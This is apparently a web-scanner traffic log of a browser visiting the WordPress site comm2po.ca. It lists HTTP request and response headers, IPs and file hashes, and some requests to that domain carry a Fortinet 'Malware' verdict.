r3.o.lencr.org/
23.36.77.32200 OK 503 B IP 23.36.77.32:0
ASN #20940 Akamai International B.V.
Hash a26d0784548ecab22f417f3d689daf23
8893b79366bbadeb5c8d587b8f023e310694df1c
35baaae7b3ce3110ebb2b075881cfab55ecf3eab57d834283fd18ac691b41fa2
POST / HTTP/1.1
Host: r3.o.lencr.org
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Content-Type: application/ocsp-response
Content-Length: 503
ETag: "35BAAAE7B3CE3110EBB2B075881CFAB55ECF3EAB57D834283FD18AC691B41FA2"
Last-Modified: Tue, 20 Sep 2022 18:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=11729
Expires: Wed, 21 Sep 2022 07:39:06 GMT
Date: Wed, 21 Sep 2022 04:23:37 GMT
Connection: keep-alive
firefox.settings.services.mozilla.com/v1/
143.204.55.35200 OK 939 B URL HTTP/1.1 firefox.settings.services.mozilla.com/v1/
IP 143.204.55.35:0
File type JSON data\012- , ASCII text, with very long lines (939), with no line terminators
Hash 1b3053fa528e28810f8a2cc9284cc921
cca9eb471d941881a6b9a1793aecb6c281908f6a
a2427848ba35575dda8a82cf88f104978234c05389deebc3fc8279d9075eff45
GET /v1/ HTTP/1.1
Host: firefox.settings.services.mozilla.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 939
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length, Backoff, Retry-After, Content-Type, Alert
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Date: Wed, 21 Sep 2022 04:13:32 GMT
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Cache: Hit from cloudfront
Via: 1.1 185768229530368be94556dcab1c486a.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: IecxWSprdofPfS9y_EvskronEk0clIuWCDOYJRWz_k2clhhiWzhSjw==
Age: 605
content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2022-10-30-18-47-44.chain
143.204.55.35200 OK 5.3 kB URL HTTP/2 content-signature-2.cdn.mozilla.net/chains/remote-settings.content-signature.mozilla.org-2022-10-30-18-47-44.chain
IP 143.204.55.35:0
File type PEM certificate\012- , ASCII text
Hash 6113f8408c59aebe188d6af273b90743
7398873bf00f99944eaa77ad3ebc0d43c23dba6b
b6e0cc9ad68306208a160f3835fb8da76acc5a82d8fde1da5a98e1de1c11a770
GET /chains/remote-settings.content-signature.mozilla.org-2022-10-30-18-47-44.chain HTTP/1.1
Host: content-signature-2.cdn.mozilla.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
content-type: binary/octet-stream
content-length: 5348
last-modified: Sat, 10 Sep 2022 18:47:45 GMT
content-disposition: attachment
accept-ranges: bytes
server: AmazonS3
date: Tue, 20 Sep 2022 04:35:14 GMT
etag: "6113f8408c59aebe188d6af273b90743"
x-cache: Hit from cloudfront
via: 1.1 814e8c24454087e83cd261a6cf477166.cloudfront.net (CloudFront)
x-amz-cf-pop: OSL50-C1
x-amz-cf-id: Tf-10HOI2HvQ_lKWiOAMBynH4PCfPWMGHZQSr71rDzs8ybiMOZgXyA==
age: 85704
X-Firefox-Spdy: h2
contile.services.mozilla.com/v1/tiles
34.117.237.239200 OK 12 B URL HTTP/2 contile.services.mozilla.com/v1/tiles
IP 34.117.237.239:0
File type JSON data\012- , ASCII text, with no line terminators
Hash 23e88fb7b99543fb33315b29b1fad9d6
a48926c4ec03c7c8a4e8dffcd31e5a6cdda417ce
7d8f1de8b7de7bc21dfb546a1d0c51bf31f16eee5fad49dbceae1e76da38e5c3
GET /v1/tiles HTTP/1.1
Host: contile.services.mozilla.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
server: nginx
date: Wed, 21 Sep 2022 04:23:37 GMT
content-type: application/json
content-length: 12
strict-transport-security: max-age=31536000
via: 1.1 google
alt-svc: clear
X-Firefox-Spdy: h2
firefox.settings.services.mozilla.com/v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US
143.204.55.35200 OK 329 B URL HTTP/1.1 firefox.settings.services.mozilla.com/v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US
IP 143.204.55.35:0
File type JSON data\012- , ASCII text, with very long lines (329), with no line terminators
Hash 0333b0655111aa68de771adfcc4db243
63f295a144ac87a7c8e23417626724eeca68a7eb
60636eb1dc67c9ed000fe0b49f03777ad6f549cb1d2b9ff010cf198465ae6300
GET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1
Host: firefox.settings.services.mozilla.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Connection: keep-alive
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 329
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: ETag, Expires, Content-Length, Cache-Control, Pragma, Content-Type, Alert, Backoff, Last-Modified, Retry-After
Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none';
Last-Modified: Fri, 25 Mar 2022 17:45:46 GMT
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
Cache-Control: max-age=3600
Date: Wed, 21 Sep 2022 04:03:22 GMT
Expires: Wed, 21 Sep 2022 04:37:30 GMT
ETag: "1648230346554"
X-Cache: Hit from cloudfront
Via: 1.1 814e8c24454087e83cd261a6cf477166.cloudfront.net (CloudFront)
X-Amz-Cf-Pop: OSL50-C1
X-Amz-Cf-Id: k2pDrOZn-ZkYrahPBolrC1weK4oMwtweNQuTsNpXMVfz_yvBSJZRIg==
Age: 1215
comm2po.ca/
72.167.59.18301 Moved Permanently 0 B IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
Hash d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
Analyzer Verdict Alert fortinet Malware
GET / HTTP/1.1
Host: comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 301 Moved Permanently
Date: Wed, 21 Sep 2022 04:23:37 GMT
Server: Apache
X-Powered-By: PHP/7.4.30
Vary: Accept-Encoding,Cookie
X-Redirect-By: WordPress
Set-Cookie: _icl_current_language=fr; expires=Thu, 22-Sep-2022 04:23:37 GMT; Max-Age=86400; path=/
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Location: https://comm2po.ca/
Content-Length: 0
Keep-Alive: timeout=5
Content-Type: text/html; charset=UTF-8
ocsp.digicert.com/
93.184.220.29200 OK 471 B IP 93.184.220.29:0
Hash edf07cd621f733b0eb50c632387ebf4f
61a082d26501c2c8d481b1676d0de2e585269613
e5c4324e4c55824b86f48bf0b9a1d317a82e7d3c19bdea7a91d78ce98d68a980
POST / HTTP/1.1
Host: ocsp.digicert.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 959
Cache-Control: 'max-age=158059'
Content-Type: application/ocsp-response
Date: Wed, 21 Sep 2022 04:23:37 GMT
Last-Modified: Wed, 21 Sep 2022 04:07:38 GMT
Server: ECS (ska/F70A)
X-Cache: HIT
Content-Length: 471
push.services.mozilla.com/
52.38.227.80101 Switching Protocols 0 B URL HTTP/1.1 push.services.mozilla.com/
IP 52.38.227.80:0
Hash d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
GET / HTTP/1.1
Host: push.services.mozilla.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Sec-WebSocket-Version: 13
Origin: wss://push.services.mozilla.com/
Sec-WebSocket-Protocol: push-notification
Sec-WebSocket-Extensions: permessage-deflate
Sec-WebSocket-Key: kphLH02MCDfJJl3arQDS4w==
Connection: keep-alive, Upgrade
Sec-Fetch-Dest: websocket
Sec-Fetch-Mode: websocket
Sec-Fetch-Site: cross-site
Pragma: no-cache
Cache-Control: no-cache
Upgrade: websocket
HTTP/1.1 101 Switching Protocols
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: J1ovU63wXZpmVRsreg2Zu327lzk=
comm2po.ca/
72.167.59.18301 Moved Permanently 1 B IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
Hash eccbc87e4b5ce2fe28308fd9f2a7baf3
77de68daecd823babbb58edb1c8e14d7106e83bb
4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce
Analyzer Verdict Alert fortinet Malware
GET / HTTP/1.1
Host: comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
HTTP/2 301 Moved Permanently
x-powered-by: PHP/7.4.30
vary: Accept-Encoding,Cookie
x-redirect-by: WordPress
set-cookie: _icl_current_language=fr; expires=Thu, 22-Sep-2022 04:23:38 GMT; Max-Age=86400; path=/
location: https://www.comm2po.ca/
content-encoding: br
content-length: 1
content-type: text/html; charset=UTF-8
date: Wed, 21 Sep 2022 04:23:38 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/
72.167.59.18200 OK 16 kB IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document text\012- exported SGML document, Unicode text, UTF-8 text, with very long lines (2443), with CRLF, LF line terminators
Hash 096038e982d9f97a374e8b9644a949b8
836cfe240fcfbe353ae94d8735cf137afad2c991
4ff8e20aaf22f643cfc6ebbb600067aac12fb59f0403be049de0ed03b24ab632
Analyzer Verdict Alert fortinet Malware
GET / HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
TE: trailers
HTTP/2 200 OK
x-powered-by: PHP/7.4.30
vary: Accept-Encoding,Cookie
cache-control: max-age=3, must-revalidate
content-encoding: br
content-length: 15842
content-type: text/html; charset=UTF-8
date: Wed, 21 Sep 2022 04:23:38 GMT
server: Apache
X-Firefox-Spdy: h2
ocsp.digicert.com/
93.184.220.29200 OK 278 B IP 93.184.220.29:0
Hash f938f3b4ff1af30191b7ff02c9e4c526
994116f14a8ddf45f8eabc147914dad7253f5ae0
323f9d9027f51c7e070a015e7c97bcdcc450a764ed52963749018f88f4413c7d
POST / HTTP/1.1
Host: ocsp.digicert.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Accept-Ranges: bytes
Age: 4977
Cache-Control: 'max-age=158059'
Content-Type: application/ocsp-response
Date: Wed, 21 Sep 2022 04:23:39 GMT
Last-Modified: Wed, 21 Sep 2022 03:00:42 GMT
Server: ECS (ska/F70A)
X-Cache: HIT
Content-Length: 278
ocsp.pki.goog/gts1c3
142.250.74.3200 OK 471 B IP 142.250.74.3:0
Hash bcbb61a4f6f0beed45a5f963bfba6e9d
a07136aeace7036e3b7427d63c60576adbdc388f
3a910cde9f8f65341f3422d28e35ca877558e136c99067b72daaeb56b3d9e76d
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 21 Sep 2022 04:23:39 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
ocsp.pki.goog/gts1c3
142.250.74.3200 OK 471 B IP 142.250.74.3:0
Hash bcbb61a4f6f0beed45a5f963bfba6e9d
a07136aeace7036e3b7427d63c60576adbdc388f
3a910cde9f8f65341f3422d28e35ca877558e136c99067b72daaeb56b3d9e76d
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 21 Sep 2022 04:23:39 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
img1.wsimg.com/tcc/tcc_l.combined.1.0.6.min.js
23.36.79.43302 Found 0 B URL HTTP/2 img1.wsimg.com/tcc/tcc_l.combined.1.0.6.min.js
IP 23.36.79.43:0
ASN #20940 Akamai International B.V.
Hash d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
GET /tcc/tcc_l.combined.1.0.6.min.js HTTP/1.1
Host: img1.wsimg.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 302 Found
content-length: 0
location: https://img1.wsimg.com/traffic-assets/js/tccl.min.js
cache-control: max-age=1800
expires: Wed, 21 Sep 2022 04:53:39 GMT
date: Wed, 21 Sep 2022 04:23:39 GMT
timing-allow-origin: *
access-control-allow-origin: *
X-Firefox-Spdy: h2
img1.wsimg.com/traffic-assets/js/tccl.min.js
23.36.79.43302 Found 0 B URL HTTP/2 img1.wsimg.com/traffic-assets/js/tccl.min.js
IP 23.36.79.43:0
ASN #20940 Akamai International B.V.
Hash d41d8cd98f00b204e9800998ecf8427e
da39a3ee5e6b4b0d3255bfef95601890afd80709
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
GET /traffic-assets/js/tccl.min.js HTTP/1.1
Host: img1.wsimg.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://www.comm2po.ca/
Connection: keep-alive
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 302 Found
content-length: 0
location: https://img6.wsimg.com/wrhs/362d20193a8fed115f99b16a157b7fc4/tccl.min.js
cache-control: max-age=1800
expires: Wed, 21 Sep 2022 04:53:39 GMT
date: Wed, 21 Sep 2022 04:23:39 GMT
timing-allow-origin: *
access-control-allow-origin: *
X-Firefox-Spdy: h2
ocsp.pki.goog/gts1c3
142.250.74.3200 OK 472 B IP 142.250.74.3:0
Hash e5d7d983b288c67e17280c6a1c0d80d9
8a1e575f8b8427e872c1e4c5645d9ce3e5445e52
a08530049c460e7e3cf236a9969b94b4a794d83f3f4279ac43934194f39dedd6
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 21 Sep 2022 04:23:39 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
img6.wsimg.com/wrhs/362d20193a8fed115f99b16a157b7fc4/tccl.min.js
23.36.79.43200 OK 11 kB URL HTTP/2 img6.wsimg.com/wrhs/362d20193a8fed115f99b16a157b7fc4/tccl.min.js
IP 23.36.79.43:0
ASN #20940 Akamai International B.V.
File type ASCII text, with very long lines (45500)
Hash 1ac00b5d5abfa64175a140de3f29a8e2
c07c5611cfff3ec4c7034134e4148f177242908c
65198366099c4eea2ed8a4dbe30fbb7896435a3505c5265260715d3385058378
GET /wrhs/362d20193a8fed115f99b16a157b7fc4/tccl.min.js HTTP/1.1
Host: img6.wsimg.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://www.comm2po.ca/
Connection: keep-alive
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
content-type: application/javascript
accept-ranges: bytes
content-encoding: br
etag: "362d20193a8fed115f99b16a157b7fc4"
last-modified: Mon, 11 Apr 2022 14:15:53 GMT
vary: Accept-Encoding
x-edgeconnect-midmile-rtt: 15
x-edgeconnect-origin-mex-latency: 135
x-amz-id-2: 73c+ZpWNgBh9xtilh6Nj22iH/BmUfkHwAgj9PgWHmvdTmSCUhi96da6Ell5SKHaif06RANK80zY=
x-amz-request-id: N5JSXGJTVEFZM8E9
x-amz-server-side-encryption: AES256
x-amz-version-id: Z0H0F1CdjRUI_nRMydHHi17Rv0HOw5tB
content-length: 11155
cache-control: max-age=31536000
date: Wed, 21 Sep 2022 04:23:39 GMT
server-timing: cdn-cache; desc=HIT, edge; dur=1
timing-allow-origin: *
access-control-allow-origin: *
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/plugins/sitepress-multilingual-cms/res/css/language-selector.css?v=3.1.9.7
72.167.59.18200 OK 1.3 kB URL HTTP/2 www.comm2po.ca/wp-content/plugins/sitepress-multilingual-cms/res/css/language-selector.css?v=3.1.9.7
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
Hash 88d24b7db52fe745f3e54b28188e662f
1f1d2a72d0212b22827c3b189bf36bb44a8f8f79
bd583f7a953312e9fe96d618ed3b7f69a524e971c82474f329b81e06e4b7b305
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/sitepress-multilingual-cms/res/css/language-selector.css?v=3.1.9.7 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 18 Aug 2015 00:59:57 GMT
etag: "1561595-1750-51d8b6fce3d40-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 1340
content-type: text/css
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/plugins/leadfox/css/leadfox.css?ver=5.4.2
72.167.59.18200 OK 136 B URL HTTP/2 www.comm2po.ca/wp-content/plugins/leadfox/css/leadfox.css?ver=5.4.2
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
Hash b339dfc48aca947f810f1b2faadad114
162e83a6d56eef2b010716ffd1807285499682f7
8838b6bb8b5e161f2d11a86bc83f57627631baad4a47f9c3f862c10837fedb6a
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/leadfox/css/leadfox.css?ver=5.4.2 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 07 Jul 2020 00:57:26 GMT
etag: "156060c-14d-5a9cf798a8980-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 136
content-type: text/css
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/plugins/sitepress-multilingual-cms/res/css/language-selector-click.css?ver=5.4.2
72.167.59.18200 OK 826 B URL HTTP/2 www.comm2po.ca/wp-content/plugins/sitepress-multilingual-cms/res/css/language-selector-click.css?ver=5.4.2
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
Hash 04fb9326f4d76d88bf1fd8b3ca320d91
999e88cd19549dd2c04695a264da6ae2a04c21c8
986351d47a114346a48daea70af24f7df4cfd49a07faf59efe01e6815643dc9e
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/sitepress-multilingual-cms/res/css/language-selector-click.css?ver=5.4.2 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Tue, 18 Aug 2015 00:59:57 GMT
etag: "1561594-9d3-51d8b6fce3d40-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 826
content-type: text/css
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.2.1
72.167.59.18200 OK 620 B URL HTTP/2 www.comm2po.ca/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.2.1
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
Hash 9f99d02cd2ebab69c2ddb8aa94ad8088
38d7a42447667ea805a063cc3012cd34b9a975d4
456d79e339948bd957d7e8d6cf2ca4ac9fda277dfbfa13093a0502322e595c08
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.2.1 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
last-modified: Thu, 06 Aug 2020 07:04:43 GMT
etag: "15410fd-780-5ac301a49b8c0-br"
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: br
content-length: 620
content-type: text/css
date: Wed, 21 Sep 2022 04:23:39 GMT
server: Apache
X-Firefox-Spdy: h2
ocsp.pki.goog/gts1c3
142.250.74.3200 OK 471 B IP 142.250.74.3:0
Hash bcbb61a4f6f0beed45a5f963bfba6e9d
a07136aeace7036e3b7427d63c60576adbdc388f
3a910cde9f8f65341f3422d28e35ca877558e136c99067b72daaeb56b3d9e76d
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Wed, 21 Sep 2022 04:23:39 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
maps.googleapis.com/maps/api/js?key=AIzaSyAKFSA04UQVh2e56stH7y86PZy3i11fEzc&ver=5.4.2
142.250.74.170200 OK 54 kB URL HTTP/2 maps.googleapis.com/maps/api/js?key=AIzaSyAKFSA04UQVh2e56stH7y86PZy3i11fEzc&ver=5.4.2
IP 142.250.74.170:0
File type ASCII text, with very long lines (2453)
Hash 6f70bbafdddfe5edd2de1dcefaac58ff
f6758d19ad2bb47077c4ac9e321ba28a6abd6195
26bf2348c2f8284b560f7f71eb91a7fc00288aab3775bf4c6d1e2983ab615f58
GET /maps/api/js?key=AIzaSyAKFSA04UQVh2e56stH7y86PZy3i11fEzc&ver=5.4.2 HTTP/1.1
Host: maps.googleapis.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
content-type: text/javascript; charset=UTF-8
date: Wed, 21 Sep 2022 04:23:39 GMT
expires: Wed, 21 Sep 2022 04:53:39 GMT
cache-control: public, max-age=1800
vary: Accept-Language
cross-origin-resource-policy: cross-origin
timing-allow-origin: *
content-encoding: gzip
server: mafe
content-length: 54039
x-xss-protection: 0
x-frame-options: SAMEORIGIN
server-timing: gfet4t7; dur=21
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
www.comm2po.ca/wp-content/plugins/wpml-cms-nav/res/css/navigation.css?ver=1.4.7
72.167.59.18200 OK 154 B URL HTTP/2 www.comm2po.ca/wp-content/plugins/wpml-cms-nav/res/css/navigation.css?ver=1.4.7
IP 72.167.59.18:0
ASN #398101 GO-DADDY-COM-LLC
File type ASCII text, with CRLF line terminators
Hash 4f6ebad13511e0f0de32aba27a2ffa5e
be1169f53e915018de86944389c4e67a07d262d9
ff808b64c5aae5e3a2e70a597f5bf67668493f68c61261a31e39e961acfe1651
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/wpml-cms-nav/res/css/navigation.css?ver=1.4.7 HTTP/1.1
Host: www.comm2po.ca
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
